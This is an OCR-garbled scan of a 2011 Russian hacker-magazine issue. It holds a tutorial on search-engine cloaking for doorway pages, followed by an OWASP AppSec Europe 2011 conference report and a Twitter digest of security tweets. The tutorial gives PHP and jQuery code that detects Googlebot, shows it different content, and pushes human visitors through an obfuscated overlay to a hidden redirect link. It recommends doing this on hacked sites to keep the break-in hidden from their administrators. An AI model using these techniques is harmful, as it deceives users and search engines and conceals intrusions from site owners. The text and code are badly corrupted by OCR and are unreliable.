той грязной внутренней оптимизации для поисковика, 
которая могла бы его спугнуть. Во втором случае пользо- 
ватель может увидеть совсем другую страничку, в корне 
отличающуюся от двух предыдущих, описанных выше. В 
последнее время клоакинг используется на взломанных 
сайтах, которые уже имеют множество внешних ссылок, и 
где уже была какая-то информация (данный факт является 
несомненным плюсом для бооб(е). Такой подход является 
самым актуальным на текущий момент и позволяет: 

1. Увеличить время жизни нашего дорвея (если мы сде- 
лали его на чужом ресурсе). 

2. Долгое время скрывать факт хака от администратора 
сайта. 

Также стоит отметить, что с точки зрения поисковых 
систем клоакингом не считается использования географи- 
ческого положения и особенностей браузера при построе- 
нии страницы, поэтому на многих безобидных белых сай- 
тах используется некое подобие клоакинга. 

Теперь настало время перейти к практике. 


Ра Ви 
НТТР://МИМИМ 


› ИпК5 

® |5согпргез$.сот — 
легкий обфускатор 
]ауа5спр{ кода. 

® |дцегу. сот —библио- 
тека/ацегу. 

ад 4оп$. по7Ща.ога/ 
еп-И5/Йгеюох/аЧ4оп/ 
тоЧНу-Пеадег$ — 
подНу Пеадег$ для 
НгеРох. 
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Промо для пользователя 


Идентификация 


Существует четыре способа идентификации пользователей и ботов: 


» НТТР гефеггег; 

» Изег-Абепт; 

» 1Р-адрес; 

» поведенческий анализ с помощью Зауа$сг1р*. 


Типичный пример идентификации поискового робота в логах НТТР- 
сервера ты можешь увидеть на соответствующем скриншоте. В целом 
же, все эти способы можно и нужно использовать вместе, потому 

что только тогда они дадут максимальную пользу для твоих дорвеев. 
Теперь поговорим о каждом из способов отдельно. 


НПР таегтег 


Первый и по праву основной метод — это парсинг и анализ заголовка 
НТТР гееггег 

С помощью данного метода мы сможем узнать следующие важные 
детали: 

1. Откуда на наш дорвей пришел пользователь. 

2. Является ли данный пользователь серчером. 

Простейшая реализация проверки реферрера без получения исходно- 


го поискового запроса выглядит так: 


<?рИр 
ыв (5 веы г: (> 5ЕБВУЕВ[НТОРАВЕРЕВЕВ ' |, 
"Бер: //=гоо21е.") 
еспо 'Информация выдаваемая серчеру"; 
е15е 
еспо "Информация выдаваемая другим’; 


2 


Стоит отметить, что подмена заголовка с реферрером не содержит в 
себе каких-либо трудностей, поэтому поисковые роботы могут маски- 
ровать себя под обычного серчера. В большинстве случаев НТТР 
геГеггег у поисковых роботов отсутствует. 


Ц5ег-Адет 


Почти каждый НТТР-клиент указывает информацию о себе в 
поле «Цзег-Адеп{» заголовка запроса. Этот параметр также не 
составит труда подменить или просто не указывать. Для лучшего 
понимания полезности данного заголовка разберем юзерагент 
гуглобота. 

Итак, поисковый робот Сбоод(е имеет несколько версий и, соответ- 


ственно, различающийся от версии к версии Цзег-Адеп:+. 
Вот несколько видов юзерагента гугла: 


» Мо7111а/5.0 (сотра{161е; боо21ебо*/2.1; 


+В ЕЪр : / /ммм. гоо81е.сот/Бот .Пт1) 
» 60021ебо*/2.1 (+НЁр: / /ммм. гоо21е. сот/бо*. ИТ) 


ХАКЕР 09/152/ 2011 


Настройка расширения МодЙу Неадег$ 


Достоверно известно, что иногда бооде заходит под видом обычного 
пользователя, указывая в качестве Цзег-Адег( один из популярных 
браузеров или просто пустое поле. Мы не будем собирать всю базу 
агентов гугла, а просто проверим все вхождения слова д009(е в юзера- 
гент с помощью одного из простейших способов на РНР: 


<РрИр 

1+ (5715г ("воо81е" ‚$ $ЕВУЕВ ["НТТР_У$ЕК_АбЕМТ"])) 
еспо ‘Это бот‘; 

?> 


|Р-адрес 

Для реализации данного способа нам потребуется база |Р-адресов 
гугла. За основу ты можешь взять базу, которую я заботливо положил 
на наш диск, но учти, что использовать только ее одну крайне нежела- 
тельно. Для удобства мы будем использовать базу в виде регулярных 
выражений, таким образом, у нас появится возможность удобного 
указания подсетей. 

Также у каждого [Р-адреса мы будем проверять По${пате на наличие в 
нем слова 9004(е: 


<?рИр 
$$Еор_1р$_та$К$ = аггау( 
"66\.249\.[6-9][9-9]\.[9-9]+", 
70. Э1\. 159,25, 
"81\.159\.49\.212"); 
фогеаси ( $$%ор_1р$_та$К$ а$ $\у ) 
{ 
1+ ( ргеё таЕсП( '#^'.$\.'$#', $ $ЕВУЕКВ[ ' ВЕМОТЕ_АООВ '])) 
{ 
еспо 'Это бот"; 
бгеак; 


1+ ($%гроз (веЕпозБуадаг ($_5ЕВ\УЕВ[ ' КЕМОТЕ_АООВ ']), '=20021е')) 
еспо 'Это бот"; 
г 


Данный способ является одновременно самым сложным и самым 
действенным, поэтому его использование при клоакинге не просто 
желательно, а обязательно. 


Сбор |Р-адресов 

Так как у гугла постоянно появляются новые подсети |Р-адресов, 
вся сложность предыдущего метода заключается в их сборе и 
обновлении. Один из способов сбора адресов роботов заключа- 
ется в создании видимой только для них ссылки на специальный 
скрипт, сохраняющий [Р-адреса всех обращений к этому скрипту: 


<а1\ $у1е="а915р1ау :попе">‹а Иге+='Фагве{ .рПр' >с11сК</а></а1\> 
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84.149. 71.45 
66.249.71.55 . 
БЕ. 169. ТЕ. 


Сам скрипт сохранения |Р-адресов будет выглядеть так: 


<?рИр 
$+ = Рореп( 'Базе.%хе','а+'); 
Ригтее (ФЕ, эвг герТасе(“. ‘, "\.', “"" 
$ ЗЕВ\МЕВ[ 'ВЕМОТЕ_АБОВ']."',\п")); 
+с1о5е($+); 


2 


Чем дольше скрипт будет собирать [Р-адреса, тем лучше. Перед 
началом использования обновленной базы обязательно очисти ее от 
дублей. 


)5-клоакинг 


Данный способ является совершенно новым направлением в клоа- 
кинге, с помощью него можно придумать кучу уловок, позволяющих 
перехитрить поискового робота. Так как в настоящее время эмуля- 
ция /ауаЗсг!р{ в бооц{е оставляет желать лучшего, хитрые дорвей- 
щики и придумали некоторые трюки, которые поисковая машина 
просто не сможет понять. В целом же, применение /5-клоакинга 
позволяет успешно анализировать поведенческий фактор и более 
точно определять «человечность» клиента. В качестве примера 

я буду использовать библиотеку /Очегу, так как она существенно 
облегчит написание кода и усложнит его разбор эмулятором. 

Сразу же хочу предупредить, что, используя ]фауа5спр{-код, ты дол- 
жен обязательно пропустить его через обфускатор, так как это нехи- 
трое действие существенно усложнит разбор кода как машинам, так 
и твоим коллегам по цеху. Но не перестарайся, потому что за слиш- 
ком сильно зашифрованный код гугл наносит санкции. 


Поведенческий анализ 


Что в первую очередь делает пользователь после захода на нужный 
ему сайт”? Правильно, он начинает выполнять какие-то действия, 
например: движения мышью, нажатие клавиш, прокрутка скроллом, 
изменение размеров окна и т.д. Именно эти действия мыи будем 
отлавливВать, а Также применим несколько хитрых уловок, о выпол- 
нении которых для каждого отдельного пользователя гугл не сможет 
сказать однозначно. 

В качестве первого примера я покажу, как можно отловить действия 
пользователя на странице с помощью ]@чегу: 


$(аоситепЕ) .геаду(ФипсЕ1оп () {4 
$ (и1паом) .61па( 
'<с11СК тоизетоуе $сго11 ге$17е Кеудомт" ,РипсЕ1Топ(еуеп*) { 
а1еге('Ты совершил: '+емуеп*.%уре); 
}); 
д: 


Результат работы данного скрипта ты сможешь увидеть на соответ- 
ствующем скриншоте. 


Трюк с картинкой 


Теперь я покажу пример небольшой хитрости, с помощью которой 
мы сможем более точно убедиться, кто именно просматривает теку- 
щую страницу. Для начала создадим файл с названием птаде.рпд и 
вставим в него следующий код: 


<РрИр 
(5 г15г( "воов1е" ‚$ ЗЕВМЕВ ["НТТР_И5ЕВ_АбЕМТ"])) 


{ 
Беадег ( 'Сопфеп*-Туре: 1таве/рп?' ); 
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= [О2ГАРЕРИ 14:42:24 -0500] СЕТ иробоеа же ИТТРУ1.0” 454 $41 “-“ "Мона ыи в, 0 (осераеьТе: босаеьоки 1.1; ЭВЕЕр: Ими, 9529 СОБЛЬСЕ „ВЕБ“ 
= [АФЕРЫ : 14:42:24 ОНИ *СЕТ / ИТТ. 200 050 *-* ЭНезЛаиф.0 |еееранчЬВн: СооТиБотиЯ 11 Вере иль ось. СЕБИЬЫЕ ВЕР * 
= [Гаага =ОБ0] "СЕТ ИбаЕ НТЕР Е. 0“ 2100 68 “= "ата гв. 0 [1-Е 1 - МЫ |= - Е а ога. сан. ТЕ |" 


Поисковый робот в логах НТТР-сервера 


геаа81е ( "1таге2.рп?'); 
р 
е15е 
{ 
Пеа4ег( 'НТТР/1.1 404 М№о{ Роипа'); 
91е(); 
} 


р 


Далее включим интерпретацию кода в файлах с расширением рпод, 
создав файл .№{“ассе$$ с таким содержимым: 


АааТуре арр11са1оп/х-ПЕЕра-рИр „рп 


С помощью /ама5спр{ выведем эту картинку на экран и проверим, 
загрузилась ли она на нашей странице: 


доситеп* .мг1*е("<1те эгс="1таве .рпя"/>'); 

$(аоситепЕ) .геаду (РипсЕТоп () { 

$('1тё[згс*="рпа" |") .еггог(Фипс1от () { 
а1ег* ( 'Ошибка при загрузке картинок '); 

}) 

в 


Что у нас получилось? При обращении картиночного робота к итаде. 
рпд он видит безобидную картинку, в то время как пользователь 
вместо этой картинки получает ошибку 404. В это же время наш 
ауа5спр\-код проверяет, были ли ошибки при загрузке картинки (а 
они как раз будут, не забывай о выданной пользователю странице). 
Таким образом, эмулятор ]ауа5спр{-робота бооц(е не сможет понять, 
что происходит с обычным юзером. Картинку робот видит, в коде есть 
проверка на ошибки, то есть даже если он сможет понять, что тут за 
проверка, то все равно пойдет по другому пути, с рабочей картинкой. 


Промо 

Чтобы добиться максимального количества переходов, нам нужно 
навязать определенные действия пользователю. Поэтому, как только 
МЫ поймем, что это не робот, на пользовательский экран сразу же 
выведется красивая информация с промо, при этом скрывая все, что 
написано на странице. 

В качестве примера приведу следующий код: 


доситеп* .мг1е ( "<41у 14="а1а1о8" с1аз5="м1пдом" > <1тв 
эгс="ргото. ря" $%у1е="сигзог: ро1п®ег;"> </4а1\> <а1у 
214="та$К"></а1\>'); 
$(аоситепе) .геаду (РипсЕТоп () {4 
$("+а1а1о8").с$$("ро$1%1о0п', 'абзо1и*е'); 
$("+а1а1о8").с$$('41$р1ау', 'попе’); 
$ ("#91а1о8").с5$5('7-1паех', '9999'); 
$("#тазК").с$$("ро$11оп', 'абзо1ие'); 
$("Нта$К").с$$('1её+', '0'); 
$("НтазК").с$$5("Фор', '0'); 
$("Нта$К").с$$('2-1паех', '9000'); 
$("#тазК").с$$( "Баскегоипа-со1ог', '#000000'); 
$("#тазК").с$$("'915р1ау', 'попе’); 
$ (м1паом) .Б1па('тоизетоуе хсго11 ге$1хе Кеудомт' , 
ФипсЕ1оп (еуе) { 
\аг мазКНетей* = $ (аоситеп*) .Пе1ей*(); 
\аг ма$Китаей = $(м1паом) .мтаеп(); 
$('НтазК').с$$(4 
'итаеИ': та$Китаеи, 
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Могучий /Очегу 


'резеп{': тазКНе1ер{ 


}); 
$('Нтазк').РааеТп(1000); 
$('#тазКк').РадеТо("$1ом", 0.90); 
$("#та$К").с$$( "БасКкегоипа-со1ог', '#900000'); 
\аг м1иН = $(м1паом) .Не1ей*(); 
\аг м1иМ = $(м1паом) .мтаей(); 
$("#+а1а1о2").с$$('%ор', млин / 2 - 
$("#а1а1о8").Пезене() / 2); 
$("#а1а1о5").с$$(' её", м1пи / 2 - 
$ ‘ната\оЕ"). ила) / 2); 
$("#+а1а1о=").РадеТп(2000); 
$ (м1паом) .Б1па(" с11сКк', РипсЕ1оп (еуепЕ) { 
$(1115).1о0аа('р1.ЕхЕ', РипсЕ1оп (гезр) { 


е\уа1( 'м1паом.1оса1оп = "" + гезр + *";'); 


$ (4115) . ипЬ1па(е\меп®); 
а: 


Как только пользователь начинает совершать какие-то действия, 
мы сразу же затемняем фон и выдаем картинку, при переходе на 
которую юзер будет перенаправлен на ссылку, находящуюся в 
файле р({ж{. Вынося ссылку в отдельный файл, мы скрываем ее от 
любопытных глаз, а также получаем возможность подгружать ее со 
стороннего ресурса. Данный метод является не самым оптималь- 
ным из-за того, что он навязывает действия серчеру, в результате 
чего пользователь уходит с нашей странички за очень короткий 
промежуток времени. 

Ты должен понимать, что, чем дольше пользователь проводит вре- 
мени на твоей странице, тем лучше эта страница выглядит в глазах 
поисковых систем. Поэтому здесь стоит выбрать что-то одно: больше 
пользователей за меньшее время или меньше пользователей за 
большее время. 


Эмуляция серчера 

После того как ты решился использовать клоакинг, тебе наверняка 
захочется протестировать его в боевых условиях, поэтому давай пред- 
ставим тебя тем самым серчером :]. Итак, чтобы сделать вид, как будто 
ты пришел с поисковика, ты можешь использовать замечательное 
дополнение для ЕгеГох под названием Моану Неадегс. 

Здесь я не буду описывать работу с МодНу Неадегз в силу его 
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интуитивно понятного интерфейса, а опишу лишь необходимые 
действия: 
1. Добавь новый заголовок и укажи в нем такие значения: 


АсЕТоп = Моа1Ру 
Мате = КеРегег 
\а1ие = Ир: //вооё1е. сот 


2. На вкладке Орйоп$ поставь галочку «АМмауз оп». 
3. После этого открывай свою проклоаченную страничку и проверяй 
работоспособность своих скриптов в качестве серчера. 


Обобщение 


Теперь настало время обобщить все способы и собрать полноценный 
скрипт клоакинга. 
В данном скрипте будут присутствовать следующие способы: 


» проверка ЦУзег Авепт; 

» проверка Кефеггег; 

» проверка ТР; 

» проверка на действия пользователя; 

» проверка картинкой; 

» подгрузка ссылки для перенаправления из стороннего файла; 
» красивый способ выдачи промо и сокрытия контента, 
задерживающие пользователя на страничке. 


Полную реализацию скрипта с базой |Р-адресов ты можешь взять 
с нашего диска. Если на твоем сервере нельзя использовать 
„Г(ассе$$, то просто удаляй картинку, и скрипт все так же останется 
работоспособным. 


Вредный Сооде ТооБаг 


Ни для кого не секрет, что у бооде есть своя панель инструментов, 
устанавливаемая во все популярные браузеры, так называемый 
Соод(е ТооШаг. Кроме видимых для юзера функций в нем при- 
сутствуют еще и скрытые модули, которые передают поисковому 
гиганту пользовательскую информацию о посещаемой странице. 
Еще несколько лет назад Сбоод(е {оо!аг можно было легко опре- 
делить с помощью |ауазсгир{, сейчас же это не представляется 
возможным.При большом количестве трафика информация с тул- 
бара начинает учитываться поисковиком, и тут наш клоакинг ста- 
новится бесполезным. Роботы начинают понимать, что страницы, 
видимые ботом и клиентом, различаются. Пока тулбар даст понять 
Соод(е, что на данном сайте используется клоакинг, может прой- 
ти много времени, поэтому тебе не стоит сильно волноваться по 
этому поводу. Проблема тулбара является одной из проблем, кото- 
рые могут помешать скрыть от гугла перенаправление пользова- 
теля на нужный нам лендинг и приносить трафик максимальное 
количество времени. Другой проблемой является поведенческий 
фактор, который гугл также успешно учитывает, если пользова- 
тель слишком быстро уходит со страницы. При обнаружении поис- 
ковиком механизмов клоакинга на сайт накладываются жесткие 
санкции, поэтому использовать данную технологию нужно с умом 
и максимально правильно. 


Заключение 


В данной статье мы подробно разобрали такую интересную вещь, как 
клоакинг. Я надеюсь, что теперь ты и сам сможешь придумать еще 
более хитрые способы обмана поисковых систем. 

Если ты собрался использовать клоакинг на практике, то обяза- 
тельно собери свою полную базу [Р-адресов и тщательно проверь 
ее. Также не используй на постоянной основе одну и ту же види- 
мую пользователю часть (ауазсгр\, промоматериалы)}, иначе гугл 
легко сможет пометить все твои странички как одну большую сеть 
дорвеев. Чем легче определить твой клоакинг, тем быстрее ты 
попадешь в бан. == 
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О\МАЗР АРРЪЕС ЕЙКОРЕ 2011: 
КАК ЭТОБЫЛО? 


ни 
НЕ 


® Как бы мог быть взломан ТМ Цег, зачем нужны сканеры 
безопасности в |ВМ, какие новые технологии появились для защиты 
браузера, что поможет при реверсинге мобильного приложения? Добро 
пожаловать, наверное, на лучшую конференцию по веб-безопасности в 


Европе. Попробую рассказать, как это было. 


ПТО 


Если для тебя слова Х5$, СЪКЕ, ЗЧ, СИск-]асктод что-то значат, 
то ты наверняка слышал и о таких организациях, как ОМ/АЗР и 
МАС. ТВе Ореп \еь АррИсаНоп 5есигцу Рго]ес{ (ОМ/АЗР] — это 
открытое сообщество и одноименная некоммерческая организа- 


ция, которая ставит себе сложную цель сделать так, чтобы безо- 
пасных приложений было как можно больше. Для этого ведется 
пропаганда безопасности в целом, а на сайте публикуются раз- 
личного рода документы, охватывающие все аспекты разработки 
и тестирования веб-приложений. Наиболее известным примером 
подобного материала является список 10 наиболее критичных 
рисков безопасности веб-приложений — О\М/АЗР Тор10 [если 
посмотреть вакансии на должность инженера по ИБ, то хорошее 
понимание уязвимостей из этого списка является обязательным 
требованием — прим. ред.). Помимо публикации полезных мате- 
риалов в рамках сообщества разрабатывается большое число 
утилит, среди них — популярные прокси для анализа НТТР- 
трафика \\ебЪсагаб и Гед АКаск Ргоху, мощный набор правил 
для МАЕ Мод$есигку, обучающее основам веб-уязвимостей окру- 
жение \\ебСоа+{ и многое другое. А для того чтобы вовлеченные 
люди могли общаться и делиться знаниями, проводятся различ- 
ные профильные конференции. Так вот АррФес Еигоре 2011 явля- 
ется самым главным событием О\М/ДЗР и, имхо, самым главным 
событием для веб-безопасников в Европе. 


О\МАЗР Арръес 


ОМ/АЗР АррФес стартовал еще в 2004 году в США и 2005 году в 
Европе и постепенно вырос в серию ежегодных конференций 
«под единым флагом» по всему миру, включая обе Америки, 
Европу, Азию, Австралию и Израиль. Городом проведения 
европейского отделения в этом году стала столица Ирландии 
Дублин, а в качестве места проведения мероприятия был выбран 
самый известный университет этой страны — Тринити-колледж 
(Дублинский университет]. Мероприятие проходило четыре дня 
(с 7 по 11 июля], первые из которых были отданы на тренинги, 
вторые же два — посвящены докладам. Тренинги как всегда 
кусались ценами, поэтому я решил в этом году обойтись без них. 
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Доклады были разделены на три параллельные секции [(защи- 
та, предотвращение, атака}, среди которых не всегда удавалось 
однозначно выбрать наиболее интересный доклад и приходилось 
чем-то жертвовать (это обычное дело с параллельными секция- 
ми]. К слову сказать, конференция получилась достаточно пред- 
ставительной. Среди спикеров можно было увидеть как предста- 
вителей известных компаний и организаций: Еогу/НР, АдоВе, 
|ВМ, \Уегхоп, М!сгозой, так и просто интересных людей. К сожа- 
лению, я на этом мероприятии в этот раз был только в качестве 
слушателя, мучившего спикеров вопросами :}. 


День первый 


Итак, первый день начался для меня с доклада Дэвида Стабли 

из / Цетеп{$ Ца на модную нынче тему и непаханое поле для 
троллинга — АРТ :}]. АРТ в данном случае — это вовсе не пакет- 
ный менеджер, как могли бы подумать поклонники Оерап 6МИ/ 
[/пих. АРТ есть Адуапсеа Регэ${еп{ Тбгеа4 или «постоянная про- 
двинутая угроза» (хотя и «целенаправленная угроза» на слух чуть 
получше буквального перевода]. Иными словами, даже установив 
все обновления безопасности, закрыв все порты на файрволе 

и заблокировав все социальные сети, ты все равно чувствуешь, 
что сделано недостаточно. Всегда есть опасение, что даже самую 
надежную защиту могут «пробить», если это будет кому-то очень 
надо, и если закажет кто-то серьезный. Радуйтесь менеджеры по 
продажам ИБ решений [наш продукт защищает даже от АРТ! и 
трепещите директоры по безопасности крупнейших (и не очень} 
компаний — АРТ идет! :} Дэвид кратко рассказал о том, как он 
понимает АРТ, о нашумевших последних случаях, которые так или 
иначе ассоциируют с этим термином. 

Удивил доклад «Как стать админом твиттера: введение в атаки 

на современные веб-сервисы» Андреса Фалкенберга из Рурского 
университета. Стало сюрпризом то, что на самом деле в докладе 
рассматривалась гипотетическая атака, а вовсе не реальный 


случай. Это, конечно, расстроило, но тем не менее, само по себе 
выступление получилось интересным и было посвящено атакам 
на веб-сервисы [в частности программные интерфейсы популяр- 
ных облачных сервисов}, предоставляющих 5ОАР-интерфейс. И 
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Дублин красив, много пабов и гиннеса :} 


конкретно на механизм защиты ХМЁЕ !дпаиге путем 
обертки подписанных ХМ[ -объектов, которые адресу- 
ются по 14 в другие, но уже со вставкой своей коман- 
ды. Получается, что для серверной части подписанная 
команда проходит валидацию нормально, но при этом 
выполнится совсем другая, подсунутая злоумышлен- 
ником! Доклад получился достаточно живым и стал 
одним из наиболее интересных с технической точки 
зрения на конференции. 

Неожиданно интересным получился доклад, а также 
секция вопросов-ответов от Марка Кросби из гиганта 
|ВМ про их опыт интеграции контролов безопасности 
в цикл разработки программного обеспечения. Что, 
если раздать разработчикам веб-приложений предна- 
строенные сканеры уязвимостей и попробовать заин- 
тересовать их вопросами безопасности таким обра- 
зом? Начнут ли они писать более безопасный код? 

А что, если устроить целое состязание в шуточной 
форме? Чувствуется, что в [ВМ в отделе безопасности 
экспериментируют с мотивацией разработчиков и 
даже пытаются подходить к этому с юмором и высокой 
долей оригинальности :]. ЗОЁС был вообще популяр- 
ной темой на конференции, правда не всегда это было 
на благо и в итоге было достаточно много «пустых» 
спонсорских докладов. 

Замыкал первый день конференции для меня немного 
скучный доклад «Основы Ру{Поп для тестировщиков 
веб-приложений» от Джастина Сирла из пСбиага!апв 
[пс. «Почему скучный?», — спросишь ты. Очень про- 
сто, сейчас уже мало кого можно удивить знанием 
Ру{Поп, и он, имхо, уже перенимает звание языка 
номер один для пентестера у могущественного РегГа. 
А коль ты пентестер веб-приложений и заинтересо- 
вался питоном, то библиотеки игШЬ/ВЕрИЬ ты уже 
наверняка расковырял и знаешь хорошо! Так что 
посвящать этому целый доклад немного странно. 
Лишь в конце доклада стало немного интереснее, 
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когда Джастин презентовал свой проект русК, который 


представляет собой набор шаблонов на питоне для 
веб-тестинга. Чтобы не писать каждый раз один и 
тот же код, ты можешь просто взять готовый шаблон, 
по-быстрому подправить его немного — и все готово. 
К сожалению, проект, судя по активности в 5\М, под- 
заброшен. 


День второй 


На второй день я все-таки решил поучаствовать в 
СТЕ, который проходил в рамках конференции. На 
самом деле это был скорее НаскОиез{ с набором бал- 
лов за пройденные задания, чем СТЕ в чистом виде. 
В самом начале само собой шли простые этапы, в 
основном с подстановкой необходимых значений в 
НТТР-заголовки запроса и просто нахождением нуж- 
ных флагов в различных местах исходных кодов. Чем 
дальше, тем, конечно, сложнее. К сожалению [да-да, 
именно так :}, в этом квесте я натолкнулся на одну 

из самых больших проблем на этой конференции: 

в здании банально практически не было доступных 
электрических розеток (кстати, английского типа, так 
что пришлось искать еще и переходник). Так что как 
только я добрался до первой десятки по баллам, мой 
ноут предательски ушел спать. 

Помнишь, я писал, что докладов про 50 на конфе- 
ренции было представлено даже избыточно? Более 
того, часто доклады про успехи в безопасности 501: 
были изрядно нашпигованы маркетинговым трешем. 
Примером этого были выступления Джанне Уусилехто 
из Мока и парней из Мтсго$ой. Красивые графики и 
клипарты, слова о киберпреступности и о том, какие 
безопасные продукты стремятся производить ком- 
пании. К слову сказать, к вебу данные презентации 
отношения имели мало. М!сгозо умудрились вообще 
вставить пропагандистскую часть про то, какие они 
теперь открытые, как дружат с опенсорсом. Я нор- 
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Страница конферен- 
ции со доступными 
для скачивания 
слайдами: 
ом/азр.огаЛп4ех.рЬр/ 
Арр5есЕ 2011 


Официальный сайт 
М/АЗС: 
мимим/. ммебаррзес.ога 


Тор1Оуязвимостей 

по версии ОМ/АЗР: 
ом/азр.огаЛп4ех.рЬр/ 
Са{едогу:О\\МАЗР 

Тор _Теп _Рго]ес{ 


Руководство по 
тестированию 
веб-приложений от 
ОМ/АЗР: 
ом/азр.ога/Лп4ех.рЬр/ 
Саедогу:О\М/АЗР 
Тезипа _Рго]ес{ 
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Ш. 
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ое Ш № Г 


Обедали мы прямо «по-спартански». Все столовые были закрыты, поэтому накрыли прямо в музее... 


мально отношусь к этим компаниям, но тут они могли вполне 
и более интересные и уместные доклады подготовить. Не без 
интереса я посмотрел на доклад «Новые стандарты и приходя- 
щие технологии в безопасности браузера» от Тобиаса Гондрома 
из рабочей группы Специальной комиссии интернет-разработок 
|ЕТЕ). Получился хороший обзор средств безопасности, так или 
иначе связанных с веб-браузером: 
® Мте-5пИИпод; 
® Зате-Опашт Росу; 
® Зесиге СВаппе!: * НТУ ${н1с{ Тгапзрог{ Зесигцу * ТЕ$ т 

ВЫ Ъ-ЕС: 
» Ггате-ОрНопб; 
® СомепЕ Зесигку Ройсу; 
® Оо-Мо{-Тгаск. 
Про большинство из них ты уже наверняка наслышан, останов- 
люсь лишь на Н$ТЪ. Атака 551 -${гррипд известна уже достаточно 
давно. Напомню, она заключается в том, что исходя из того, что 
веб-браузер жертвы не знает, что с конкретным сайтом можно 
взаимодействовать строго по НТТР$, злоумышленник, про- 
пуская трафик жертвы через свой хост (например, с помощью 
атаки АКР-5$роойпд)}, заменяет все ПИр$-ссылки на обычные 
Юр. Таким образом, трафик до него приходит в открытом виде, 
а уже от хоста злоумышленника до сайта создается полноценное 
551 -соединение. НТТР 511сЕ Тгапзрог" Зесигйу [Н$Т5}] как раз и 
позволяет веб-приложению явным образом сказать веб-браузеру, 
что работа с ним должна идти строго по НТТРЪ. Делается это 
отправкой в НТТР$-ответе специального заголовка: 5${п<{- 
Тгапзрог{-5есигИу: тах-аде=15768000; псши4еЗи6Оота!т®. 
В данном случае веб-приложение просит веб-браузер в течение 
15768000 секунд обращаться к нему строго по НТТР5, включая 
субдомены. 
Одно из самых достойных технических выступлений подготовил 
Дэн Корнелл из Оепит Сгочр. Он практически препарировал 
мобильное приложение на примере 10$ и Апаго!а-платформ 
с указанием на фишки каждой из них. Какие утилиты можно 
использовать для бинарного анализа мобильного приложения, 
что интересного хранится в конфигах, и к чему может привести 
5@ЁЕ-инъекция в мобильном приложении, — все это Дэн рас- 
сказал, сопровождая примерами и юмором. Одной из основных 
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идей доклада стала атака на мобильное приложение через его 
же зарегистрированный в системе контент-хэндлер: <Игате 
5гс=»{Ре_<срете://5{и 7 рагат=РАУГОАВ» />. Получается инте- 
ресная атака на стыке веба и мобильного мира. Мобильные при- 
ложения, ровно как и «мобильное все», сейчас, конечно же, на 
взлете популярности, так что стоит обратить внимание на этот не 
совсем «вебовский» доклад. 

Достаточно интересным получился доклад Джастина Кларке из 
Со{Пат О19Ка{ $<епсе о практическом аспекте криптоатак на 
веб-приложения. На криптографии базируется огромный костяк 
технологий информационной безопасности. 

Но криптография — весьма непростая наука, и нередко раз- 
работчики ошибаются при собственной реализации алгоритмов 
или при неправильном использовании существующих. Это и 
постарался рассказать Джастин. Криптографическая тема обыч- 
но не из самых захватывающих, особенно когда ты не крип- 
тоаналитик, но тут после демонстрации того, как с помощью 
радатд-криптоатаки получилось вытащить содержимое конфига 
дотнетовского приложения, стало гораздо увлекательнее :]. 

Не обошли стороной и генераторы случайных чисел и риски, 
связанные с их необдуманным использованием (вспоминается 
отличная статья «Неслучайные числа» \/млм.хаКер.ги/падагте/ 
ха/119/058/1.азр). Это выступление я бы назвал одним из самых 
интересных на конференции. Обязательно посмотри слайды на 
сайте конференции. 


Очцто 


Пара слов о месте проведения конференции. Тринити-колледж 
превзошел ожидания. Мало того, что это хорошо оснащенное 
учебное заведение, которое входит в Дублинский университет, так 
еще и насквозь пропитанное историей. Шутка ли, он был основан 
в 1592 году Королевой Елизаветой |! Очень сильно надеюсь, что 

и в России универы приблизятся когда-нибудь по условиям для 
обучения к подобным вузам. Сама конференция О\М/А$Р Арр5Фес 
Ечгоре тоже удалась. Даже несмотря на малое количество и не 
всегда высокий уровень технических докладов. И даже несмотря 
на весьма специфичную ирландскую погоду :]. Надеюсь, что в 
следующем году в Греции все-таки приму участие в конфе уже как 
спикер. = 
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НААСКЕВ ГИЕЕТЬ 


© Твиттер в последнее время стал настоящей кладезью знаний по информационной 
безопасности. Но это следствие. Важна причина — втвиттере обитает тусовка самых 
продвинутых ресерчеров и хакеров. Чтобы вовлечь тебя в этот мир и приблизить к элите, 
Алексей Синцов в этой колонке будет ежемесячно отбирать самые интересные твиты. У него и 
у самого есть микроблог — {м ег. сот/азшт$оу — советуем тебе с него и начать. 


(сезагсег: 
Советик ресерчерам: круче 
искать новый вектор атаки, 
чем уязвимости: если ты 
нашел всего один новый вектор, то ты 
нашел дюжину уязвимостей. 


(‘аР'оН’Вапиа: 

Если тебе понравились мои 
последние исследования 
(типа такого: {.со/Уехр /Р}, то 
ты можешь номинировать меня на рм/пие 
а\уаг4$ (.со/ЕбЫК!6). 

Комментарий: Петр Бания — известный 
исследователь, который в отличие от 
большинства хакеров акцентирует свое 
внимание на методах защиты. С его 
исследованиями можно ознакомиться 

по указанной ссылке, а кроме того — ты 
можешь отдать свой голос на номинацию 
его как автора (ну можно, конечно, и 
другого выбрать} на приз в номинации 
«Лучшее исследование года», проходя- 
щее в рамках В(асКВа{ 2011 в Лас-Вегасе. 


(Аи 5ес: 
Арест людей не остановит нас, | 
ФБР! Мы прекратим огонь, 
если вы оденете башмаки на 
ваши головы. Это единственный способ 
остановить все это! 


*Шикарный* заголовок вакан- | 
сии: «5опу Щесгопис$ ищет 
талантливого сеньора анали- 
тика по информационной безопасности 
приложений в нашу штаб квартиру в Сан- 
Диего. Ты знаешь зачем.» 


(еудокК!то\45: 
[ОА уб.1 и НехКаус \1.5 утекли. 


История ВИр://.со/9400В5@ 
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(азпауег: ее 


(‘аОхспагие: 
Хороший секюрити исследо- 
ватель != хороший пен-тестер. 


9100ги: 
Закинул на блог другое 
описание М$11-056: С\Е- 
2011-1282: Разыменование 
нулевого указателя в Цзег-Моче & Ко. 
Смотри ссылку: В р://. со п. 
Комментарий: Известный польский 
хакер сообщает подробности и иные 
детали для реализации атаки на С$В$5- 
подсистему с использованием уязвимо- 
сти С\УЕ-2011-1282. 


(Чаагопро{поу: 

Я почти уверен, что мог бы 
найти кучу багов, банально 
ища конструкции «сгпр гедё8, 
ОхЗЕ». Почему, ну почему, так любят 
разработчики писать свои собственные 
ХМЕ-парсеры? 

Комментарий: Аарон Портной рас- | 
сказывает простой принцип поиска 
ХМЕ-парсера по шаблону «стр гед8, 
ОхЗЕ» (0х3ЗЕ — символ закрытия тэга: 

'>'. стр — инструкция сравнения). 

Или же, где программа ищет символы 
тэгов, говорит о том, что она их обра- 
батывает — например, это может быть 
ХМЕ-парсер... а они обычно дырявые) 


‘а0хспаг(е: 

Ну же МЪ: найти удаленную 
багу в \/пдом/$ 7 — 0 баксов. 
Найти ребят, кто запустит 
ботнет — 250 000 долларов. Реактивное 
